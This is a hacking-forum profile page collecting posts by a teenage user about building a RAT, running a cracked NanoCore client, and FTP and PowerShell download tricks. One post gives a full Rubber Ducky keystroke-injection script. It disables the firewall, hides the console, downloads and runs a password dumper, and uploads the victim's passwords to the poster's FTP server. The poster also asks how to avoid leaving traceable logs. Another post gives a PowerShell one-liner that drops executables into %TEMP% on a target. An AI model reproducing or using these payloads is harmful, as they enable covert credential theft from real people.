Jump to content

contrix_

Active Members
  • Content Count

    18
  • Joined

  • Last visited

Posts posted by contrix_

  1.  

    6 minutes ago, Dave-ee Jones said:

    The RAT would need to have remote access details directly to your computer which would have to have some kind of willing security breach. In that case, why would you upload it online if it could remotely access your computer with the click of a button?

    And why not make a VM with a virus scanner on it and do some offline scanning, instead?

    I uploaded the file which would have granted me access if someone executed it.

     

    I also considered doing it with a VM, but I would have to download all these virus scanners, which is the advantage oft online scanners.

  2. So this is basically an update to my post here: 

     

    I didn't know how the person got my RAT in the first place and how they got onto my computer. Now I know that it wasn't someone that got into my Computer because of the cracked version of the Rat-Program - even though there was a silent monero miner in it - but it was someone that got my file from VirusTotal. It's a site where you can scan files and see which out of like 50 antiviruses detect it. I didn't know that they distribute the files and that you can straightly DOWNLOAD them from the site. So someone was probably running a bot on a Virtual Machine, that downloads all files that get flagged as a rat by the antivirus programs on VirusTotal and download them. I remember that I once saw a video on YouTube where someone was able to get into the machine of someone that tried to RAT him by using the file of that person.

     

    So is there a way that someone used my file to get into my computer? What are they able to do with it?

     

    Thanks for any answers ;)

     

    PS: From now on, if I have to use a online virus scanner, I'm using nodistribute ^^

  3. 15 hours ago, Dave-ee Jones said:

    Theoretically he could've been running any Windows, but from the description it sounds like 98. Was Wireshark actually running or did you just see the icon on the desktop? Either way, worst case scenario is he's a hacker that was trying to hack you. 'Best' case scenario is he was curious and wanted to try out something.

    Not sure what 'found' and 'terminated' could relate to, could be the connection, but I don't think it would say 'found' if a connection between you and him was seen. Terminated was probably when (or just before) you were cut off if that's the case.

     A command prompt running a Python script with the name 'clock' is a bit weird, though. Not sure there, could be anything. Not sure why he would name it clock..

    No, Wireshark was not running or at least I didn't see it.

     

    14 hours ago, i8igmac said:

    What ports are used, when a target machine runs the trojin, does it connect back to your machine? If so then you would have configured port forwarding? What port if this?

     

    You should monitor this port, its possible random traffic hit your open port but also possible your tool is a backdoor. hackforum is full of bs tools.

     

    I may have misunderstood what you see. A vnc session? Maybe some one ran your trojin from a vm.

     

    6

    I don't know the port anymore because I deleted it. It was probably a VM, I think the Display measures I saw in nanocore were 800x800 and I used a VM that had these quarter windows once

    Update:

    Last night I left my computer on due to Ethereum mining and had 1 browser window open. When I got up and looked at my screen, the browser window was closed and I was on my Steam Account Page where I can see my Payment Methods and all that stuff. I didn't have that much time because I had to go to school, but in the browser history were some new listings, and I only saw the first. It was a sellfy (or something similar) website where someone had a website that was someone like "crackpw" and sold something for 20 Euros. I bet those where my passwords or a connection to my pc. I also had an email from Coinbase (you can buy bitcoins there) that someone logged in from MY IP, but the Account was empty and without any payment methods anyways. After school, I changed the most of my passwords but I wasn't able to log into my second PayPal Account because the password was changed and the telephone number was also changed, so they had access to my email, too. I can't send a ticket to PayPal about that because I used false names and streets (no not a fake id) but there were only a few dollars on it.

     

    I didn't notice anything else. I'm going to start my computer without Internet, save some important files that I know are 100% not infected on an external drive and gonna reset my whole computer completely.

    Or can I track where the RAT is installed and delete somehow?

    Thanks for your answers, I hope you will take your time again to answer me ;)

     

    contrix_

  4. Hello,

    something really weird happened to me yesterday. I created a RAT that I encrypted in a WinRar File and wanted to troll some of my friends with. I send the file in the chat of my discord server (similar to Teamspeak) and before that tested it on virustotal.com and a similar site. No one downloaded it (unfortunately ^^), but a few hours later (when none of the people that were on the discord were online) anymore, I saw a connection coming in. I used a cracked version of NanoCore that I got from some hacking forum (it was created by Alcatraz3222 and thousands of people downloaded it). The Computer had an IP from the USA (doesn't have to be true, it show that I'm from England even tho I have a German IP) and had no Antivirus installed. The name of it was something with a C at the beginning, and a y and an o (don't remember it exactly). I wanted to know who that was and opened the windows to the screen. He had some old version of Windows installed which I didn't know (its the one with the gray taskbar, pretty basic). There was a command prompt running, which had a python logo and was named "clock". I don't remember what was in it, but it was testing for something the whole time and once said something about "found" and "terminated". The only other thing I saw was Wireshark on the desktop. A few seconds after that, he disappeared from my client list. I didn't use any protection like VPN or a firewall at that moment.

    After that, I got really scared for some reason and turned off my computer. Does someone know how he got on my list and what he was doing? Maybe I'm getting ratted and he wanted to see what that file was, or a discord server ran the file?

    I really need your help ;) 

    Cheers,

    contrix_

     

    PS: Sry for my bad English, I'm German and just 14 years old as you probably already assumed by my writing ^^

     

    PPS: While writing this text I overwrote my text two times, even tho I don't think I touched the insert button. I'm getting really paranoid xD

  5. Hello,

    I wanted to download files via CMD, and the first way I discovered was FTP. I rent a server and everything worked. The problem is that it takes kinda long to type in the credentials. After some research I found this PowerShell line: 

    powershell (new-object System.Net.WebClient).DownloadFile('http://website.com/file.exe','%TEMP%\file.exe')

    But I have some questions:

    1.  What is the part after %TEMP% for? Is that the destination where the files "arrives"? So if i wanted to download it to C:\, I just have to change it to C:\, right?
    2. Where can I host the file for free? I found some web server hosting sites, but the only databases I was able to find were FTP and MySQL.

    Thank you for your help ;)

  6. At first: I´m sorry for my bad English, I´m only 14 and german ^^

    So I just wrote this Rubber Ducky Script that downloads a .exe and a .bat from my FTP Server. Then it executes the .exe with the .bat file what creates a .txt file with all the passwords of the victim (of course me when I forgot my passwords :P). Then it deletes the .exe and .bat and uploads the .txt back to my server (it gets deleted after that, too.).

    Here´s the script:

    DELAY 1000
    REM
    REM start cmd
    REM
    REM
    GUI r
    DELAY 500
    STRING powershell Start-Process cmd -Verb runAs
    ENTER
    DELAY 2000
    STRING Alt j												
    DELAY 1000													
    REM
    REM
    REM disable firewall
    REM
    REM
    STRING netsh advfirewall set currentprofile state off 
    ENTER
    DELAY 500
    REM color unreadable
    REM
    STRING mode con:cols=18 lines=1										
    ENTER													
    STRING color FE												
    ENTER													
    REM
    REM
    REM download FTP
    REM
    STRING ftp myftpserver.com
    ENTER
    DELAY 1000
    STRING username
    ENTER
    DELAY 1000
    STRING password
    ENTER
    DELAY 500
    STRING lcd C:\
    ENTER
    DELAY 100
    STRING binary
    ENTER
    DELAY 100
    STRING GET i.exe
    ENTER 
    DELAY 8000
    STRING lcd C:\
    ENTER
    DELAY 100
    STRING binary
    ENTER
    DELAY 100
    STRING GET r.bat
    ENTER
    DELAY 800
    STRING by
    ENTER
    DELAY 500
    REM
    REM
    REM PASSWORD STEAL
    REM
    REM
    REM
    STRING cd C:\
    ENTER
    DELAY 500
    STRING r.bat
    ENTER
    DELAY 10000
    STRING del r.bat
    ENTER
    DELAY 500
    STRING del i.exe
    ENTER
    REM
    REM
    REM
    REM UPLOAD
    REM
    REM
    REM
    REM
    DELAY 500
    STRING ftp myftpserver.com
    ENTER
    DELAY 1000
    STRING username
    ENTER
    DELAY 1000
    STRING password
    ENTER
    DELAY 1000
    STRING lcd c:\
    ENTER
    DELAY 100
    STRING ascii
    ENTER
    DELAY 100
    DELAY 800
    STRING put p.txt
    ENTER
    DELAY 500
    STRING bye
    ENTER
    DELAY 300
    STRING del c:\p.txt
    ENTER
    DELAY 200
    STRING netsh advfirewall set currentprofile state on
    ENTER

    I´m right now working on decreasing the delays, but the download and upload delays are hard to time because it obviously depends on the internet speed the victim has. 

    My ideas to improve this script:

    Leave the first FTP windows open so I don´t need to log in again(Cons: 1.I could get thrown out of the session after some time 2. I probably wouldn´t be able to switch with ALT + TAB because I don´t what other windows the victims has open)

    My question:

    Does this leave something like a log file? So that the victim could trace me back? If so, where would it be located?

     

    Do you guys have some suggestions? I would love to hear them :D

    Disclaimer: I can´t put the .exe on my Rubber Ducky using the Twin Duck method because I am using the MalDuino from Seytonic (basically cheap RubberDucky) which cannot be used as a Twin Duck.

    Thanks for your answers,

    contrix_

    Edit:

    This is the batchfile:

    i /stext p.txt

    Disclaimer 2: Everything works fine without any problems.

     

  7. At first: Sorry for my bad English, I´m german and only 14 years old.

    I upload an .exe file from my computer to my FTP Server with the FTP.exe(cmd). Before I did that it was working just fine. But after I downloaded it, it comes up with the following error: "The file is not compatible with your computer." Before that, it came up with another error, something like "not compatible with a 64 Bit System.

    I accidently asked the question on StackOverflow 2 hours ago, and some people answered that I have to active binary mode. When I do that with the "binary" command, I get an answer that the activation was successful, but it isn´t working anyways. The .exe looks identical after download, but instead of having the old icon it shows up the standard .exe icon. I do not want to use another FTP program like FileZilla or ncftp (I tried it with FileZilla, it isn´t working either, so I don´t think, that FTP.exe is the problem here.

    The commands I used + Output(maybe the translation isn´t correct, but I think you know what the output meant):

    C:\WINDOWS\system32>ftp myftpserver.com
    Connection to icarus.bplaced.net established.
    220 Welcome to myftpserver.com, FTP server standing by ...
    504 Unknown command
    User (myftpserver.com:(none)): user
    331 Hello user, your FTP account password is required:
    password: password
    230-Login successful, your current directory is /
    230 34349 Kbytes used (3%) - authorized: 1048576 Kb
    ftp> binary
    200 TYPE is now 8-bit binary
    ftp> get example.exe
    200 PORT command successful
    150-Connecting to port 61051
    150 347.5 kbytes to download
    226-File successfully transferred
    226 1.648 seconds (measured here), 210.83 Kbytes per second
    FTP: 355794 bytes received in 1.91 seconds 186.38KB/s
    ftp>

    Thanks and greetings, c0ntriX

    Edit: I´m owning a 64-Bit System.

  8. I tried the pasv, it didn´t work. The script is a PowerShell code. But do you know what I have to insert in "????"? It was originally "FTP_Folder". Maybe it´s the target folder on the FTP Server? It it would be the root folder, I would just have to type in "/", right? The folder "files" is empty when I inserted "/".

  9. So I just tried a script from the StackOverflow Site, but when I execute it, nothing happens.

      #FTP Server Information - SET VARIABLES
        $ftp = "myftpserver.com" 
        $user = 'User' 
        $pass = 'pass'
        $folder = '????'
        $target = "C:\Users\me\Desktop\files"
    
        #SET CREDENTIALS
        $credentials = new-object System.Net.NetworkCredential($user, $pass)
    
        function Get-FtpDir ($url,$credentials) {
            $request = [Net.WebRequest]::Create($url)
            $request.Method = [System.Net.WebRequestMethods+FTP]::ListDirectory
            if ($credentials) { $request.Credentials = $credentials }
            $response = $request.GetResponse()
            $reader = New-Object IO.StreamReader $response.GetResponseStream() 
            while(-not $reader.EndOfStream) {
                $reader.ReadLine()
            }
            #$reader.ReadToEnd()
            $reader.Close()
            $response.Close()
        }
    
        #SET FOLDER PATH
        $folderPath= $ftp + "/" + $folder + "/"
    
        $files = Get-FTPDir -url $folderPath -credentials $credentials
    
        $files 
    
        $webclient = New-Object System.Net.WebClient 
        $webclient.Credentials = New-Object System.Net.NetworkCredential($user,$pass) 
        $counter = 0
        foreach ($file in ($files | where {$_ -like "*.exe"})){
            $source=$folderPath + $file  

     I don´t know what to insert in $folder, the guy who made it just wrote "FTP_Folder". Is that the target folder on the FTP Server? It it would be the root folder, I would just have to type in "/", right? The folder "files" is empty when I inserted "/".

  10. I tried the exact same as the guy in the video did. You can see the commands I used in my question. The problem with a 3rd party FTP client is, that the "victim" doesn´t have it installed. I put WinSCP(which is a 3rd party FTP client) on my server, but surprisingly I couldn´t download it. I´ll try that PowerShell thingy. Thanks for your effort tho.

  11. Thank you for your answer. I tried everything you said, but it didn´t work. I just tried it on Linux with -p for passive mode and everything worked fine, so the passive mode is the problem.

    Btw: I just remembered that I asked the question here because it had nothing to do with the Rubber Ducky. I only had the problem with the commands and had already a script from the Payloads site + Batch File, that used those commands.

    But thanks for your answer anyways ;) Do you have any idea how I can solve that passive problem? Why and how can others download files from an FTP Server via CMD then?

  12. I wanted to make a Rubber Ducky Script that uploads or downloads from my FTP Server.

    I came up with these commands:

    For downloading:

    ftp -i ftpserver.com
    
    *typing in username and pass*
    
    get file.exe (yes the files is in the root folder)
    

    The login worked fine. On my first FTP Server, I got the Error message " Error 500 Unable to service PORT commands" . After some research, I found out, that the ftp.exe does not support passive mode (no, the pasv command didn´t work). For whatever reason, i tried it on my other servers. So I´m typing everything in again, and then I get the message "200 Port command successful" and a few seconds after that "425 Could not open data connection to port 65086: Connection timed out" (no, the server wasn´t down).

    For uploading I used these commands:

    ftp -i ftpserver.com
    
    *typing in username and pass*
    
    lcd C:\Users\myname\Desktop
    
    put myfile.exe

    With this commands i get the same error as on Server 1 and 2.

    Can anyone help me?

     

    contrix_ ;)

×
×
  • Create New...